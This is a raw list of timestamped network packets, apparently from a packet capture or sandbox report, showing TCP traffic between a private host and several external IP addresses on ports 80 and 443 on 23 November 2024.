Nov 23, 2024 07:09:43.451843977 CET	49864	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.451855898 CET	443	49864	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.452275038 CET	49864	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.452280998 CET	443	49864	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.493208885 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.493251085 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.493303061 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.493347883 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.493808985 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.493870974 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.493908882 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.493949890 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.494951010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.495044947 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.495081902 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.495096922 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.495795012 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.495925903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.496362925 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.496959925 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.496985912 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.497009039 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.497028112 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.498111010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.498162985 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.498233080 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.498279095 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.499301910 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.499408007 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.499460936 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.500494003 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.500559092 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.500610113 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.501606941 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.501667976 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.501733065 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.502837896 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.502892017 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.502897024 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.503298998 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.503946066 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.503998995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.504040003 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.504446983 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.505274057 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.505338907 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.505408049 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.505573988 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.506262064 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.506285906 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.506328106 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.506360054 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.507400990 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.507457018 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.507499933 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.507683992 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.508676052 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.508826017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.508882999 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.509718895 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.509771109 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.509813070 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.509984970 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.510890961 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.510942936 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.511025906 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.511159897 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.512063980 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.512211084 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.512270927 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.513228893 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.513323069 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.513341904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.513380051 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.514430046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.514478922 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.514540911 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.515151978 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.515208006 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.515239000 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.515290022 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.515346050 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.515551090 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.515655041 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.515707970 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.516274929 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.516691923 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.516752958 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.516794920 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.517148018 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.517885923 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.517941952 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.517978907 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.518021107 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.519017935 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.519067049 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.519109011 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.519309998 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.520152092 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.520273924 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.520338058 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.521347046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.521410942 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.521449089 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.521614075 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.522505999 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.522557020 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.522574902 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.523030043 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.523643017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.523782969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.523837090 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.524811029 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.524869919 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.524928093 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.525995970 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.526047945 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.526086092 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.526232958 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.526509047 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.526523113 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.526588917 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.526604891 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.526680946 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.526700974 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.526730061 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.526753902 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.527158976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.527254105 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.527328968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.528321028 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.528405905 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.528440952 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.529469967 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.529536963 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.529551983 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.529917002 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.530622005 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.530680895 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.530710936 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.530874968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.531801939 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.531871080 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.531938076 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.531950951 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.531970024 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.532016039 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.532048941 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.532075882 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.532958984 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.533025026 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.533072948 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.533101082 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.533303976 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.534154892 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.534172058 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.534234047 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.535454988 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.535480976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.535525084 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.535563946 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.536420107 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.536482096 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.536534071 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.536715031 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.537602901 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.537736893 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.537857056 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.538196087 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.538274050 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.538284063 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.538357019 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.538638115 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.538683891 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.538714886 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.538750887 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.538800955 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.538810968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.538851976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.538896084 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.539937973 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.540010929 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.540018082 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.541071892 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.541127920 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.541213036 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.541335106 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.542249918 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.542305946 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.542459965 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.542507887 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.543390989 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.543524027 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.543577909 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.544578075 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.544626951 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.544663906 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.544883013 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.544974089 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.544991016 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.545047045 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.545082092 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.545106888 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.545131922 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.545753002 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.545867920 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.545937061 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.546880960 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.546967983 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.547041893 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.548054934 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.548167944 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.548230886 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.549249887 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.549268961 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.549304962 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.549333096 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.550383091 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.550436974 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.550478935 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.550714970 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.551534891 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.551634073 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.551666021 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.551713943 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.553049088 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.553100109 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.553129911 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.553144932 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.553847075 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.553908110 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.553944111 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.554542065 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.555008888 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.555062056 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.555104017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.555293083 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.556159019 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.556215048 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.556255102 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.557333946 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.557385921 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.557413101 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.560139894 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.560184956 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.560240984 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.560277939 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.560302973 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.560713053 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.574243069 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.574301004 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.574341059 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.574393034 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.574418068 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.574541092 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.589238882 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.589283943 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.589306116 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.589333057 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.589368105 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.589390993 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.604360104 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.604409933 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.604456902 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.604474068 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.604505062 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.604541063 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.618956089 CET	443	49870	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:43.619102955 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:43.619782925 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:43.619788885 CET	443	49870	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:43.620594025 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:43.620599031 CET	443	49870	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:43.680526018 CET	443	49866	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.680603981 CET	443	49866	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.680736065 CET	49866	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.681257010 CET	49866	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.681276083 CET	443	49866	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.685661077 CET	49883	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.685745001 CET	443	49883	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.686064959 CET	49883	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.686398983 CET	49883	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.686423063 CET	443	49883	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.694554090 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.694581032 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.694631100 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.694667101 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.694973946 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.695027113 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.695194960 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.695333004 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.695363045 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.695411921 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.696398020 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.696449995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.696491957 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.697031975 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.697576046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.697601080 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.697628975 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.697681904 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.698642969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.698792934 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.698851109 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.699767113 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.699867964 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.699924946 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.700896025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.700953960 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.700979948 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.700999975 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.702079058 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.702126980 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.702279091 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.702327013 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.703180075 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.703237057 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.703279972 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.703465939 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.703708887 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.703771114 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.703809977 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.703826904 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.703860998 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.704313993 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.704379082 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.704411983 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.704447031 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.704462051 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.704530001 CET	443	49876	23.219.161.135	192.168.2.6
Nov 23, 2024 07:09:43.705440998 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.705522060 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.705555916 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.705703974 CET	49876	443	192.168.2.6	23.219.161.135
Nov 23, 2024 07:09:43.705719948 CET	443	49876	23.219.161.135	192.168.2.6
Nov 23, 2024 07:09:43.705765963 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.706584930 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.706650019 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.706713915 CET	443	49876	23.219.161.135	192.168.2.6
Nov 23, 2024 07:09:43.706734896 CET	80	49817	185.215.113.206	192.168.2.6
